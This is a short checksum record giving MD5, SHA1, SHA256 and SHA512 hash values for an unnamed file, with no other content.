MD5 88a3da02ffad376e980aec73ef439858
SHA1 daac11608fc143b9a5d6d7cb4b72e82b6f25e1f4
SHA256 e9b207335f77f63cc66063c0605982658b76a7ffd8b266a78da50c538984dece
SHA512 c378f53e3393a90a820876f0800cac32c7bcda899419edc49bc89b50e841603a392e4debf875c91e80b96167f7a827a42dc2f6be18a1102e1df3ea8a53cabb54